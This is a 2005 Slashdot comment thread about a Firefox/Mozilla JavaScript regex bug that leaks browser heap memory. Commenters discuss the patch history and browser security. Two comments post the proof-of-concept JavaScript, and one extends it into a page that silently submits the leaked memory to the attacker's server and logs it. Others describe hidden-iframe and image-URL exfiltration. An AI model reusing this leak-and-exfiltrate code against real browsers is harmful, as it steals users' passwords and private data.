Mozilla / Firefox Memory Exposure Vulnerability

JimmyM writes "Secunia has a story regarding a new severe vulnerability in the Mozilla Suite and Firefox browser, which can be exploited by any web site to read all memory, which the browser process has access to. No patch is available from Mozilla. A demonstration is available here."

Did the Mozilla/Firefox guys ignore a warning?

[astrashe]

Did the Mozilla/Firefox guys ignore a warning about this, or did this site publish the vulnerability without giving them a chance to patch?

Re:Did the Mozilla/Firefox guys ignore a warning?

[rogabean]

Excellent question.

Just tested out the "proof test" myself. Amazing some of the stuff I still had in memory here ;)

Followed by the browser shutting itself down after about 20 furious clicks on the link! :P

Re:Did the Mozilla/Firefox guys ignore a warning?

[DJayC]

According to bugzilla it's fixed on the trunk. The last comment for the bug associated with this vulnerability says:

Fixed on trunk, AVIARY_1_0_1_20050124_BRANCH, and MOZILLA_1_7_BRANCH.

Thanks for the report, I hope that's the last bug from 1997 left ;-).

/be

Re:Did the Mozilla/Firefox guys ignore a warning?

[Vaevictis666]

From the bugzilla bug report (copy it, they disallow /. links):

Opened: 2005-04-01 13:40 PDT
Last modified: 2005-04-01 22:39 PDT
Resolution: FIXED

So yes they did, it was fixed in under 10 hours, and published 3 days later.

Re:Did the Mozilla/Firefox guys ignore a warning?

[klui]

Comments seem to indicate that it's a very old bug...

------- Additional Comment #6 From Brendan Eich 2005-04-01 17:49 PDT [reply] -------

BTW, this bug is like 8+ years old. Roger Lawrence fixed half of it in 2000:

r=norris,waldemar
Fixes for bugs#23607, 23608, 23610, 23612, 23613. Also, first cut at URI
encode & decode routines.

Unfortunately, AFAICT none of the bugs he cites had anything to do with the two
hunks of that revision:

@@ -1061,16 +1080,22 @@ find_replen(JSContext *cx, ReplaceData *
@@ -1138,16 +1163,17 @@ find_replen(JSContext *cx, ReplaceData *

that half-fixed the original 1997-era bug. /be

Re:Did the Mozilla/Firefox guys ignore a warning?

You can try the 1.0.3 release candidate, in which this bug is fixed, and which is due to be rolled out very soon. See here for download links.

Re:Did the Mozilla/Firefox guys ignore a warning?

[BinLadenMyHero]

copy it, they disallow /. links

Or just drag the link over the tab bar. Over an empty space (or the close button if it's full) to create a new tab, or over an existing tab to load the link there.

Confusing write-up

[Smack]

Can a remote site actually get access to this information, or is it only displayable on the screen?

Re:Confusing write-up

[cjsnell]

Can a remote site actually get access to this information, or is it only displayable on the screen?

The data is being displayed within a TEXTAREA box, so it's probably as simple as adding an onClick="javascript:document.form.submit();" (or onMouseOver, etc.) to the document.

Yes, this is very dangerous.

Re:Confusing write-up

[orangesquid]

AFAIK, JavaScript could do something with this information, such as load an image that has ?randominfo appended, and this could be extracted from the server logs, or it could fill in a hidden item on a POST form that you're about to submit to be less obvious about it.

Re:Confusing write-up

[Kelerain]

If they can display it in a form like that, they could submit that information in a hidden form window on a stie where you typically expect to submit info (a login page for example). Javascript can talk to a website back end as well I think.

Also from the article:
"A vulnerability has been discovered in various Mozilla products, which can be exploited by malicious people to gain knowledge of potentially sensitive information."

So yeah, this is a bit more dangerous than the old load the root folder in an iframe trick.

Re:Confusing write-up

[Sentry21]

Javascript could access this, then send that information to a form via a GET request (URLencoded) to a script via a 1x1 pixel iframe hidden on the page, or even a display: hidden; iframe for that matter.

I don't think this is necessarily a huge problem - it's a critical bug, but until we see some major code execution or phishing, it probably won't be as big of a deal as it could be.

The question is, can they find out how big of a memory chunk they can read before they start reading? If so, they could grab god knows how many megs and start uploading it somewhere (somehow - that's too big for a GET query) and just dump it, but if they read too much and try to read what Firefox can't access, it should (emphasis 'should') get killed by Windows instead of failing silently.

I'm shocked!

[samael]

I seem to recall that every time an IE bug appeared people would say that Mozilla was much more secure, and that it wasn't just that IE was targetted by hackers because of the popularity, but that the software was inherently more secure.

But now it seems there are patches for Mozilla every few weeks for _exactly_ the same kind of problems that IE used to get slated for.

Is Mozilla actually more secure? Or is it just as bad as any other piece of software?

Re:I'm shocked!

[FidelCatsro]

from the looks of it , these problems are not affecting the rest of the OS(as far as i can tell from the explination on secuna) i did a few tests and it is only reading the memory area from the browser , how far into the memory it can go i do not know (does it say ? the secuna advisory is shallow on details as ussual).
Well unlike MSIE this is a bug rather than a feature(ActiveX) and all software has bugs but aparently it is patched so will be rolled out soon.
Getting details on this is not the easyes but acording to the bug reports someone was saying the problem was perhaps in the browser for the last 8 years..

------ Additional Comment #6 From Brendan Eich 2005-04-01 17:49 PDT [reply] -------

BTW, this bug is like 8+ years old. Roger Lawrence fixed half of it in 2000:

r=norris,waldemar
Fixes for bugs#23607, 23608, 23610, 23612, 23613. Also, first cut at URI
encode & decode routines.

Unfortunately, AFAICT none of the bugs he cites had anything to do with the two
hunks of that revision:

@@ -1061,16 +1080,22 @@ find_replen(JSContext *cx, ReplaceData *
@@ -1138,16 +1163,17 @@ find_replen(JSContext *cx, ReplaceData *

that half-fixed the original 1997-era bug.

/be

Re:I'm shocked!

[ChipMonk]

The possibility of identity theft is nothing to be careless about. However, Mozilla on Unix/Linux still has the advantage over IE on Windows, in that a normal user account is not able to take down the entire system without considerable effort on the part of the attacker. Desktop Windows pre-XP had no problem with anything a user did, up to and including deleting the C:\WINDOWS directory.

So the original assertion is still, at least partly true: The software underneath the apps is more secure.

Re:I'm shocked!

[samael]

Which is fair enough.

Of course, I can reinstall the OS in about two hours.

It's my documents I actually care about...

Re:I'm shocked!

[NanoGator]

"Is Mozilla actually more secure? Or is it just as bad as any other piece of software?"

It's a commonly held belief that Microsoft programmers come from Elbonia. Once it is accepted that Mozilla programmers are just as Elbonian as MS Programmers, the security zealousy will die down.

(Disclaimer 1: This post does not say that Mozilla is less secure (or more secure, for that matter) than IE. This post does not say that Mozilla programmers are incompetent. This post does address zealotry and nothing else.)

(Disclaimer 2: It really fucking pisses me off that I have to write this stupid disclaimer because lots of people with mod-points will not accept anything that's even remotely negative about Mozilla. Learn how to take criticism before dispensing it.)

Re:I'm shocked!

[dougmc]

Mozilla is at version 1.7.5 and Firefox is at version 1.x. IE is approaching version 7.0.

And Linux is at version 2.6.something, and Windows is at version 2003 and Solaris is at version 10 (having jumped from 2.6 to 7.) Fedora Core is at FC3 (or is that RH12?) Doom is up to Doom 3, and Jake 2.0 was released at 2.0 and never made 2.1. And I think Sid died at version 6.7. Relevance?

Version numbers don't mean anything. They're arbitrary, and you cannot compare them to the numbers of other products like you appear to be doing, at least not in any meaningful way.

Re:I'm shocked!

[Ogerman]

Is Mozilla actually more secure? Or is it just as bad as any other piece of software?

In terms of design decisions, you might easily say that Mozilla is more secure than IE. (not being integrated with OS and all..) In terms of coding bugs, Mozilla is no different than any other super complex piece of software. But there's another way to look at it. Because the Mozilla code is open, we might expect an ugly rash of bugs to be found near the beginning of its rise to popularity. But we might also expect this to rapidly taper off as all the major bugs are found and squashed. So you might say that now is a relatively dangerous time to use Mozilla (instead of say.. Konqueror or Safari). But, on the other hand, it's still not quite popular enough to attract the volume of real-world attacks that IE has received. Honestly, if you're some jerk running a malicious website, are you going to target this quirky bug in Mozilla or the myriad of IE exploits that are sure to pay off?

What does bother me is that the Mozilla folks haven't taken automated updates seriously enough. I cringe to think of how many Firefox early adopters have no clue what that little red arrow at the top of their screen is. Or if they do, how many dial-up users will be patient enough to wait for the update to download.. which isn't really an update at all but a full copy of the latest version.

oh man

all those l33t hackers will be able to see all my pr0n!

It looks like it requires Javascript

[wowbagger]

It looks like, in order to make use of this flaw, the attacker must get the victim to run Javascript.

Once again demonstrating the danger in the current mindset of "I will use Javascript to do everything, even things that can be done with plain HTML like opening a new window".

I have my Mozilla configured to ask me if I want it to fetch Javascript from remote sites (alas, you cannot protect yourself from Javascript embedded in the HTML of the site you are visiting), to ask me if I want to run any requested plugins, and to ask be before allowing any cookies to be set on my browser.

If you can, try this yourself - you will be AMAZED at the number of sites that insist upon setting a cooking on you the first thing when you visit them, or that insist upon trying to load Javascript, or Flash plugins.

Cookies are fine for sites which require log-in (e.g. /.). Javascript is fine for sites that need to do some client side processing (e.g. order entry sites which use JS to compute the order amounts to avoid a round-trip to the server). Flash is fine for some applications.

But please don't over use them.

Re:It looks like it requires Javascript

[ChipMonk]

Only if JavaScript is completely disabled, will this attack fail. JavaScript in the [HEAD] block executes as soon as the page loads. If this code is buried in that block, it will execute without any further intervention from the user.

Definately a big hole

[RzUpAnmsCwrds]

This is a *huge* hole. In three clicks, it disclosed previous URLs that I had visited, POSTDATA (including my Slashdot password) and a bunch of other stuff.

If this could be automated (and it easily could be with something like XML-RPC), imagine the possibilities for phishing. Visit a page, have your credit card number disclosed.

Time for Firefox 1.03.

IE & Opera Unaffected

[TFGeditor]

Just for grins, I tried it wi IE and Opera. Just threw up a bunch of XXXXX in the text box.

Clearly a Mozilla-specific problem.

Re:IE & Opera Unaffected

[MoogMan]

Well yeah, otherwise the headline would be

"Mozilla / Firefox / IE / Opera Memory Exposure Vulnerability"

wouldn't it?

Re:IE & Opera Unaffected

[Zork+the+Almighty]

No, it would be "New Critical IE Vulnerability" and it would be on the front page...

Simple JavaScript

[duerra]

It works if you don't click quickly and repeatedly in Firefox.

It's almost scary... the JavaScript for this looks to just abuse a buffer overflow in an almost scary-easy way.

function genGluck(str){
var x = str;
var rx=/end/i;
x = x.replace(rx,function($1){
$1.match(rx);
return "";
});
x = x.replace(/^end/,"");
return x;
}

function readMemory()
{
var mem = genGluck("{10,246 "X's" here}end");

mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

document.getElementById('result').value = mem;

}

No problem here

[jkerman]

just displays all "XXXXXXXXXXX" for me.

using OSX with nightly builds auto-downloaded with FireFix (which is a really neat app)

Re:No problem here

[dougmc]

just displays all "XXXXXXXXXXX" for me.

Hey! How did it find my password on your browser?!@?!@$?!

Ok, confirmed

[cjsnell]

You can write a nasty little page that continuously dumps the 10k bytes of memory data to a file on your server. Here's an example that uses an HTML::Mason page to do this:

<HTML>
<HEAD>
<TITLE>Nasty Demo</TITLE>
</HEAD>
<BODY BGCOLOR='#FFFFFF' COLOR='#222222' onLoad="readMemory();">
<SCRIPT language="JavaScript">
function genGluck(str){
var x = str;
var rx=/end/i;
x = x.replace(rx,function($1){
$1.match(rx);
return "";
});
x = x.replace(/^end/,"");
return x;
}

function readMemory()
{

First peice of readMemory() removed to satisfy Slashdot crapfilter

mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

document.nasty.result.value = mem;

document.nasty.submit();

}

</SCRIPT>
<FORM METHOD=POST NAME='nasty'>
<INPUT NAME=result TYPE=HIDDEN VALUE='' onClick='readMemory();'>
</FORM>
<BR><BR>
</BODY>
</HTML>

<%args>
$result => ''
</%args>
<%init>
open(OUTFILE,'>>/tmp/outfile');
print $result OUTFILE;
close(OUTFILE);
</%init>

Safari slightly vulnerable?

[inio]

In addition to a bunch of Xs, Safari threw a little piece of Javascript code not originating on the source page into the end of the text box. Looks light it might be a little vulnerable too.

Re:Safari slightly vulnerable?

[LincolnQ]

No, Safari doesn't support Javascript's function objects (lambdas?), which the test seems to use. I don't know if rewriting the test in a different way would make it work, but I doubt it. It appears to be a flaw in the regular expression engine in Gecko.

Download the latest patched version right here

[OmegaGX]

Download the latest patched version right here: http://ftp.mozilla.org/pub/mozilla.org/firefox/nig htly/latest-trunk/firefox-1.0+.en-US.win32.install er.exe
I just used it and I am not vulnerable: all I see are lot's of X's just like in IE.

Access to firefox heap, not entire system

[jgoemat]

This exploits a vulnerability in Mozilla/FireFox's javascript engine. It allows the javascript code on the web page to access an arbitrary amount of heap data of the FireFox application. The locations in memory and the size of the block returned cannot be set, so you basically get random data from FireFox's heap. Most likely under a kilobyte of data will be returned, and it will most likely be data from some web page or file you downloaded.

This data is available to the javascript engine then, so it is possible for the javascript to submit it a number of ways to an internet server. It could call a web service with the data or post it to a web page. The server could then organize this data and examine it for anything interesting.

This will not allow someone to read your personal files or hijack your computer. The real problem would be if stored passwords or sensitive data from web mail or banking sites were on the heap and were found this way and transmitted to a web site. A large amount of 'Junk' would have to be sifted through in order to get any juicy data though.

The only way to be save right now is (in FireFox) to go to Tools->Options, go to "Web Features", and uncheck "Enable Javascript". Seeing as many sites (including /.) require javascript to use, this really isn't a good option. I hope the team gets a fixed version out soon.

Re:Access to firefox heap, not entire system

[TheGratefulNet]

slash requires js?

since when?

I disable js for all but 1 or 2 sites that I visit.

prefbar (mozilla/firefox) allows a single click to turn on/off jscript. get it and use it.

but you don't need js for slash. you never have.

comma

which can be exploited by any web site to read all memory, which the browser process has access to

I don't normally complain about the grammar and punctuation of submitters and editors, but in this case it is too significant. The difference between

read all memory, which the browser process has access to

and

read all memory which the browser process has access to

Is profound. The first form says that the browser has access to all memory. The second form says that the web site has access to all the memory to which the browser also has access. Catching and fixing stuff like this is what an editor does. If Slashdot's people can't do that, then don't call them editors. Call them "Dudes Who Click Approve," or something like that.

Re:CRASH?

[srstoneb]

The first time I tried it, it didn't merely crash Firefox. When I clicked the "test now" link my entire system immediately died, and began rebooting. After reboot, the test now works (and confirms my vulnerability).

Windows 98 SE, Firefox 1.0.2.

Other Gecko-based browsers affected as well.

[Lazyhound]

K-Meleon has the same problem, only it probably won't be patched for months, forcing me back to Firefox. Bah.